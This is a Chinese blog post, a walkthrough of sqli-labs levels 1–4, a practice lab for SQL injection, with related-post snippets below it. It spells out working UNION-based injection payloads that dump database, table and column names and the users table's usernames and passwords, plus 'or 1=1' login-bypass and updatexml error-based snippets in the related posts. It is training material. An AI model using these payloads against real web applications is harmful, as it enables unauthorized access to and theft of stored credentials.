sql-labs通关记录(1-4)

最新推荐文章于 2024-05-26 21:07:50 发布
最新推荐文章于 2024-05-26 21:07:50 发布
阅读量610 收藏 6
点赞数 2
分类专栏: Web 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36676979/article/details/105660111
版权

less-1
在这里插入图片描述首先判断一下是否存在注入(步骤还是要按流程的),在id=1后面直接加 ’ ,看看返回信息。
在这里插入图片描述提示单引号没有闭合,再加一个单引号试试。
在这里插入在这里插入图片描述图片描述返回正常,说明存在注入。接下来判断是数字型还是字符型。
在这里插入图片描述'and ‘1’='1 返回正常。

在这里插入图片描述'and ‘1’='1 返回错误,说明是字符型注入。

接下来判断显示多少列数据,用order by.

在这里插入图片描述
在这里插入图片描述3的时候显示正常,4的时候报错,说明只显示了3列数据。(当排序的数据类型和数据库中的数据类型不同时就会显示出来)

接下来开始联合注入,union 联合注入,union 的作用是将两个 sql 语句进行联合。Union 可以从 下面的例子中可以看出,强调一点:union 前后的两个 sql 语句的选择列数要相同才可以。U nion all 与 union 的区别是增加了去重的功能。
当 id 的数据在数据库中不存在时,(此时我们可以 id=-1,两个 sql 语句进行联合操作时, 当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返 回了我们构造的 union 的数据。

爆数据库
构造:id=-1' union select 1,database(),3--+
在这里插入图片描述
爆数据表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security

在这里插入图片描述
爆users表的列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users

在这里插入图片描述爆用户名和密码

?id=-1' union select 1,group_concat(username,":",password),3 from users --+

在这里插入图片描述
less-2

和less-1步骤一样,只不过是数字型的sql注入。

爆库:

?id=-1 union select 1,database(),3

在这里插入图片描述爆表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

在这里插入图片描述爆字段

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'

在这里插入图片描述
爆数据

?id=-1 union select 1,group_concat(username,":",password),3 from users

在这里插入图片描述less-3
首先加个单引号,
在这里插入图片描述注意报错信息,说明查询语句中加了括号,
在这里插入图片描述加上)即可。

buzho步骤和less-1一样,只不过将单引号’加上一个)。id=-1’)

less-4
发现加单引号没什么用,试试双引号。

在这里插入图片描述这里它意味着,代码当中对 id 参数进行了 “” 和 () 的包装。
加上)–+,
在这里插入图片描述显示正常。
步骤和less-3一样,将单引号改成双引号即可。

less-5

qq_36676979
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL-labs/less1通关教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
SQL-LIBS闯关挑战 1-65
qq199531的博客
08-29 205
这是一个自己做的SLQlabs通关笔记,目前更新33题
sql-labs学习
weixin_64286326的博客
02-08 2205
前言: 年前学习过sql的知识,现在忘得差不多了,趁这个机会赶紧在复习一下。 1 万能密码 在mysql里面 -- # 他们都代表注释 我们在登陆框内输入账号密码,服务器会在数据库内进行查询,大概是这样 select * FROM user WHERE username= '111' AND password= '222' 假如我们在登录框内的username填写 1' or 1=1# 效果是这样 SELECT * FROM user WHERE username= '1'
sql-labs靶场环境搭建(手把手保姆级教学)
最新发布
焦虑的焦虑
05-26 2101
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 5008
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
sql-labs通关
whisper921的博客
03-05 1万+
less 1—单引号字符型注入 字符型注入,单引号 通过随机输入id得知用户名和密码,网址后面接?id=1 判断 Sql 注入漏洞的类型:1.数字型 2.字符型 用 and 1=1 和 and 1=2 来判断: 1.Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。 2.Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 ,页面运行错误,则说明此 Sql 注入为数字型注入。 .
sql-labs
m0_74606212的博客
03-10 406
sql-labs
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-lab通关txt
07-22
1. **基础概念**:理解什么是SQL注入,它的工作原理,以及它对系统安全的影响。 2. **识别漏洞**:学会如何识别可能导致SQL注入的不安全的查询,例如,通过观察HTTP请求参数、错误消息或其他暴露的敏感信息。 3. *...
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 4930
sql注入经典靶场Sql-labs全关详解,正在加急更新中
sql-labs靶场环境搭建
ljlrookiebird的博客
03-29 2784
有可能mysql无法打开,应该是和你本地的mysql冲突了,找到命令提示符界面右键使用管理员打开后,输入命令:sc delete mysql,删除你本地的mysql,记住用管理员打开,否则可能没有权限导致无法删除,删除后即可在phpstudy面板正常启动mysql服务。最近突然想对网安知识进行复习,然后就想起之前做过的sql-labs靶场,这个靶场对于我们学习sql注入的知识还是比较有帮助的,接下来我就记录下我的闯关过程吧,本文章一共分为环境搭建和闯关两部分。初始化完成后就可以愉快的开始闯关了。
sql-labs(1-8关)
2302_80935968的博客
04-17 2144
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 8884
sql注入集合
sql-labs(1~4)
qq_53142368的博客
03-13 2691
学习目标: sql-labs 靶场基础练习 学习内容: sql-labs 靶场1~4关 学习时间: 2021年3月7日~2021年3月13日 学习产出: 前言 说出来满满都是泪呀 /(ㄒoㄒ)/~~ 我的靶场一直搭建不好,tmd,PHP study下载好了,并且在db-creds.inc里的用户地址也改为了本地127.0.0.1(localhost) 但是在打开靶场,发现打不开题(知道有多难受么)知道最近才问学长,同学,才发现是自己的PHP study版本太高了,这里就又出现一个问题,哎,我下载了好几个版本
sql-labs 闯关 5~10
qq_44663230的博客
08-14 1522
sql-labs 第5~10关 盲注系列
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs通关1-5
09-03
sqli-labs通关4关:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值